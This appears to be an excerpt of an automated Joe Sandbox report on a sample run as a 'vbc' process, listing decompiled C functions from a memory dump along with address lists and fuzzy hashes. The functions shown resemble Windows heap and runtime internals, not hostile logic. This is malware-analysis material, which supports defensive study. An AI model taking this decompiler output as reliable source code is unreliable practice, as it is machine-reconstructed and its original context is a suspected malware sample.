                                                  0x015e4c5b
                                                  0x015e4c5c
                                                  0x015e4c63
                                                  0x015e4c6b
                                                  0x00000000
                                                  0x00000000
                                                  0x01626776
                                                  0x01626784
                                                  0x01626784
                                                  0x0162679f
                                                  0x016267a7
                                                  0x016267af
                                                  0x016267ce
                                                  0x00000000
                                                  0x016267b1
                                                  0x016267b7
                                                  0x016267b8
                                                  0x016267c1
                                                  0x016267d3
                                                  0x016267d9
                                                  0x016267dd
                                                  0x015e4c94
                                                  0x015e4c94
                                                  0x015e4c98
                                                  0x015e4c9c
                                                  0x015e4ca3
                                                  0x016267f4
                                                  0x016267f4
                                                  0x015e4cb5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015e4cb5
                                                  0x015e4c79
                                                  0x015e4c7e
                                                  0x015e4c89
                                                  0x015e4c8b
                                                  0x015e4c8f
                                                  0x015e4c8f
                                                  0x00000000
                                                  0x015e4c89
                                                  0x016267c3
                                                  0x00000000
                                                  0x016267c3
                                                  0x016267af
                                                  0x015e4c73
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7bc6cf6851814be511b1e8cd931ab1cc5bff935c61016f1c3005b035409e3dc
                                                  • Instruction ID: f346af1b0b54e5d3f38da20445cc6b88c5c41c668dd7723cd25171382c9a9798
                                                  • Opcode Fuzzy Hash: b7bc6cf6851814be511b1e8cd931ab1cc5bff935c61016f1c3005b035409e3dc
                                                  • Instruction Fuzzy Hash: D9417D35A006299ADB21DF68C944BEEB7F4BF45700F0104A9E908AB341EB749E84CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E4D3B Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E015E4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x16ad360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E015FFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x16a7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E015FB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L015D4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E015BCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E015FB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E015FF380(_t67 + 0xc, 0x1595138, 0x10) == 0) {
								 *0x16a60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E015E4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E015E4E70(0x16a86b0, 0x15e5690, 0, 0) != 0) {
					_t46 = E015BCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                  0x015e4d3b
                                                  0x015e4d4d
                                                  0x015e4d53
                                                  0x015e4d58
                                                  0x015e4d65
                                                  0x015e4d6c
                                                  0x015e4d71
                                                  0x015e4d77
                                                  0x015e4d7f
                                                  0x015e4d8c
                                                  0x015e4d8e
                                                  0x015e4dad
                                                  0x015e4db0
                                                  0x015e4db7
                                                  0x015e4db8
                                                  0x015e4db9
                                                  0x015e4dba
                                                  0x015e4dbb
                                                  0x015e4dc1
                                                  0x015e4dc8
                                                  0x015e4dcc
                                                  0x015e4dd5
                                                  0x015e4dde
                                                  0x015e4ddf
                                                  0x015e4de0
                                                  0x015e4de1
                                                  0x015e4de6
                                                  0x015e4de7
                                                  0x015e4de9
                                                  0x015e4df3
                                                  0x00000000
                                                  0x00000000
                                                  0x01626c7c
                                                  0x01626c8a
                                                  0x01626c8a
                                                  0x01626c9d
                                                  0x01626ca7
                                                  0x01626cac
                                                  0x01626cb2
                                                  0x01626cb9
                                                  0x00000000
                                                  0x01626cbf
                                                  0x01626cbf
                                                  0x00000000
                                                  0x01626cbf
                                                  0x01626cb9
                                                  0x015e4dfb
                                                  0x01626ccf
                                                  0x01626cd3
                                                  0x015e4e32
                                                  0x015e4e39
                                                  0x01626ce0
                                                  0x01626cf2
                                                  0x01626cf2
                                                  0x01626ce0
                                                  0x015e4e3f
                                                  0x015e4e41
                                                  0x015e4e51
                                                  0x015e4e51
                                                  0x015e4e03
                                                  0x015e4e03
                                                  0x015e4e09
                                                  0x015e4e0f
                                                  0x015e4e57
                                                  0x00000000
                                                  0x00000000
                                                  0x015e4e1b
                                                  0x015e4e30
                                                  0x015e4e5b
                                                  0x015e4e5b
                                                  0x00000000
                                                  0x015e4e30
                                                  0x015e4e11
                                                  0x015e4e11
                                                  0x015e4e16
                                                  0x00000000
                                                  0x015e4e16
                                                  0x015e4e01
                                                  0x00000000
                                                  0x015e4e01
                                                  0x015e4da5
                                                  0x01626c6b
                                                  0x00000000
                                                  0x015e4dab
                                                  0x015e4dab
                                                  0x00000000
                                                  0x015e4dab

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87a8081ebc69813e1bddecd3383a3f58d258706f8e76e00fde5badd28941d7fd
                                                  • Instruction ID: 939795cd464b135a537e4efdcf14ac62814b09f90645f538add2a7208e81488d
                                                  • Opcode Fuzzy Hash: 87a8081ebc69813e1bddecd3383a3f58d258706f8e76e00fde5badd28941d7fd
                                                  • Instruction Fuzzy Hash: 8F41BE71E403199FEB369F18CC84BAAB7E9FB54610F00449AE945DF281D770ED44CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015C8A0A Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E015C8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x16ad360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E015FB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E015CE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1591180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E015E1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E015F3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E015C8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                  0x015c8a0a
                                                  0x015c8a1c
                                                  0x015c8a23
                                                  0x015c8a2e
                                                  0x015c8a30
                                                  0x015c8a36
                                                  0x015c8a3c
                                                  0x015c8a3e
                                                  0x015c8a4a
                                                  0x015c8a52
                                                  0x015c8a9c
                                                  0x015c8aae
                                                  0x015c8a58
                                                  0x015c8a5e
                                                  0x015c8a6a
                                                  0x015c8a6f
                                                  0x015c8a75
                                                  0x015c8a7d
                                                  0x015c8a85
                                                  0x015c8a86
                                                  0x015c8a89
                                                  0x015c8a93
                                                  0x015c8a99
                                                  0x015c8a9b
                                                  0x00000000
                                                  0x015c8aaf
                                                  0x015c8abe
                                                  0x015c8ac3
                                                  0x015c8acb
                                                  0x015c8ad7
                                                  0x015c8ae0
                                                  0x015c8af1
                                                  0x00000000
                                                  0x015c8af1
                                                  0x015c8acd
                                                  0x015c8ad5
                                                  0x015c8afb
                                                  0x015c8afd
                                                  0x015c8aff
                                                  0x015c8b07
                                                  0x015c8b22
                                                  0x015c8b24
                                                  0x015c8b2a
                                                  0x015c8b2e
                                                  0x015c8b3f
                                                  0x015c8b78
                                                  0x015c8b41
                                                  0x015c8b52
                                                  0x015c8b54
                                                  0x015c8b5c
                                                  0x015c8b74
                                                  0x015c8b74
                                                  0x015c8b5c
                                                  0x015c8b3f
                                                  0x015c8b5e
                                                  0x015c8b61
                                                  0x015c8b64
                                                  0x015c8b64
                                                  0x015c8b6c
                                                  0x015c8b6c
                                                  0x015c8b11
                                                  0x01619cd5
                                                  0x01619cd5
                                                  0x015c8b17
                                                  0x015c8b1a
                                                  0x015c8b1a
                                                  0x00000000
                                                  0x015c8ad5
                                                  0x015c8a89

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1030d6290919c7a169ed3c4f1c65674db9bed5ac77350fd83711d11b3cea3bf5
                                                  • Instruction ID: 20a0e3771c34509479daad7a00affbe76fe8fcc61eaa84378aae62e2826c22eb
                                                  • Opcode Fuzzy Hash: 1030d6290919c7a169ed3c4f1c65674db9bed5ac77350fd83711d11b3cea3bf5
                                                  • Instruction Fuzzy Hash: 6D4152B0A002299FDB24DF99CC88AADB7F4FB94714F1045EDD9199B252D7709E84CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0167AA16 Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0167AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0167ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0167AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0167AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0165CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L015D77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E015D7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0167131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0165CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                  0x0167aa1f
                                                  0x0167aa21
                                                  0x0167aa23
                                                  0x0167aa2b
                                                  0x0167aa30
                                                  0x0167aa36
                                                  0x0167aa39
                                                  0x0167aa42
                                                  0x0167aa75
                                                  0x0167aa7a
                                                  0x0167aa7c
                                                  0x0167aa7c
                                                  0x0167aa88
                                                  0x0167aa8a
                                                  0x0167aa8f
                                                  0x0167ab02
                                                  0x0167ab04
                                                  0x0167aa99
                                                  0x0167aaa8
                                                  0x0167aaaf
                                                  0x0167aab3
                                                  0x0167aacc
                                                  0x0167aad1
                                                  0x0167aad6
                                                  0x0167aae0
                                                  0x0167aaf3
                                                  0x0167aaf9
                                                  0x0167aafe
                                                  0x0167aafe
                                                  0x0167aaf3
                                                  0x0167aad6
                                                  0x0167aab3
                                                  0x0167ab07
                                                  0x0167ab0a
                                                  0x0167ab11
                                                  0x0167ab23
                                                  0x0167ab13
                                                  0x0167ab1c
                                                  0x0167ab1c
                                                  0x0167ab2b
                                                  0x0167ab44
                                                  0x0167ab44
                                                  0x0167ab51
                                                  0x0167ab51
                                                  0x0167aa44
                                                  0x0167aa47
                                                  0x0167aa4c
                                                  0x00000000
                                                  0x00000000
                                                  0x0167aa5a
                                                  0x0167aa64
                                                  0x0167aa72
                                                  0x00000000
                                                  0x0167aa66
                                                  0x0167aa66
                                                  0x0167aa68
                                                  0x0167aa6a
                                                  0x00000000
                                                  0x0167aa6a

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                  • Instruction ID: a6d2bd62d1a8949f71793dfddd6789fb13db59045145b8faab34a38113b51133
                                                  • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                  • Instruction Fuzzy Hash: E631FD32B002056BEB159BA9CD45BBFFBABEF84A10F098469ED05A7391DB748D00CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0167FDE2 Relevance: .1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E0167FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0167FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01680A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E015D7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01671608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01682B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0167C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0167DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E015D7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0167A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                  0x0167fde7
                                                  0x0167fde8
                                                  0x0167fdec
                                                  0x0167fdee
                                                  0x0167fdf5
                                                  0x0167fdf7
                                                  0x0167fdfc
                                                  0x0167fe19
                                                  0x0167fe22
                                                  0x0167fe26
                                                  0x0167fec6
                                                  0x0167fecd
                                                  0x0167fed5
                                                  0x0167fee7
                                                  0x0167fed7
                                                  0x0167fee0
                                                  0x0167fee0
                                                  0x0167feef
                                                  0x0167ff00
                                                  0x0167ff02
                                                  0x0167ff07
                                                  0x0167ff07
                                                  0x00000000
                                                  0x0167feef
                                                  0x0167fe33
                                                  0x0167fe55
                                                  0x0167fe59
                                                  0x0167fe5b
                                                  0x0167fe5e
                                                  0x0167fe69
                                                  0x0167fe6d
                                                  0x0167fe6d
                                                  0x0167fe69
                                                  0x0167fe35
                                                  0x0167fe41
                                                  0x0167fe41
                                                  0x0167fe79
                                                  0x0167fe8b
                                                  0x0167fe7b
                                                  0x0167fe84
                                                  0x0167fe84
                                                  0x0167fe93
                                                  0x00000000
                                                  0x0167fea8
                                                  0x0167feba
                                                  0x00000000
                                                  0x0167feba
                                                  0x0167fdfe
                                                  0x0167fe01
                                                  0x0167fe02
                                                  0x0167fe08
                                                  0x0167ff0c
                                                  0x0167ff14
                                                  0x0167ff14

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                  • Instruction ID: da20950cb04d393b5099aa7c6890111b48f7b9f4803bee91936a7e1f18aa53ce
                                                  • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                  • Instruction Fuzzy Hash: 13310632310641BFE3229B6CCC45F6ABBAAEBC5A50F184998E9568B342DB74DC41C764
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0167EA55 Relevance: .1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E0167EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E015D2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0167E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E015BF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E015CFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0167AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0167BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E015D7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0166FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E015CFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0167A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                  0x0167ea55
                                                  0x0167ea66
                                                  0x0167ea68
                                                  0x0167ea6c
                                                  0x0167ea6f
                                                  0x0167ea72
                                                  0x0167ea75
                                                  0x0167ea7a
                                                  0x0167ea7a
                                                  0x0167ea7e
                                                  0x0167ea80
                                                  0x0167ea85
                                                  0x0167ea8b
                                                  0x0167eab5
                                                  0x0167eabc
                                                  0x0167eabf
                                                  0x0167eabf
                                                  0x0167eaca
                                                  0x0167eace
                                                  0x0167ead0
                                                  0x0167eae4
                                                  0x0167eaeb
                                                  0x0167eaf0
                                                  0x0167eaf5
                                                  0x0167eb09
                                                  0x0167eb0d
                                                  0x0167eb1d
                                                  0x0167eb2d
                                                  0x0167eb38
                                                  0x0167eb3d
                                                  0x0167eb41
                                                  0x0167eb4a
                                                  0x0167eb60
                                                  0x0167eb4c
                                                  0x0167eb52
                                                  0x0167eb59
                                                  0x0167eb59
                                                  0x0167eb68
                                                  0x0167eb71
                                                  0x0167eb71
                                                  0x0167ea8d
                                                  0x0167ea8f
                                                  0x0167ea92
                                                  0x0167ea97
                                                  0x0167ea97
                                                  0x0167ea9b
                                                  0x0167ea9c
                                                  0x0167ea9e
                                                  0x0167eaa6
                                                  0x0167eaa6
                                                  0x0167eb7e

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                  • Instruction ID: 563e33186b7835e793d795852ea1d08016d0fa4ca0336fda1e4cbc53d0fa4d46
                                                  • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                  • Instruction Fuzzy Hash: 2E31D4326047069BC719DF28CC80A6BB7AAFFC4610F04496EF95287741DF31E809C7A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 016369A6 Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E016369A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x16ad360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L015C6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01636BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E015F9980() >= 0) {
							E015D2280(_t56, 0x16a8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x16a8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x16a8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E015BB6F0(0x159c338, 0x159c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E015F9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E015F95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E015CFFB0(_t68, _t77, 0x16a8778);
				}
				_pop(_t78);
				return E015FB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                  0x016369b5
                                                  0x016369be
                                                  0x016369c3
                                                  0x016369c9
                                                  0x016369cc
                                                  0x016369d1
                                                  0x016369d3
                                                  0x016369de
                                                  0x016369e1
                                                  0x016369ea
                                                  0x016369f6
                                                  0x016369fe
                                                  0x01636a13
                                                  0x01636a14
                                                  0x01636a15
                                                  0x01636a16
                                                  0x01636a1e
                                                  0x01636a26
                                                  0x01636a31
                                                  0x01636a36
                                                  0x01636a37
                                                  0x01636a40
                                                  0x01636a49
                                                  0x01636a4a
                                                  0x01636a53
                                                  0x01636a59
                                                  0x01636a5d
                                                  0x01636a5e
                                                  0x01636a64
                                                  0x01636a67
                                                  0x01636a6a
                                                  0x01636a6d
                                                  0x01636a70
                                                  0x01636a77
                                                  0x01636a7d
                                                  0x01636a86
                                                  0x01636a89
                                                  0x01636a9c
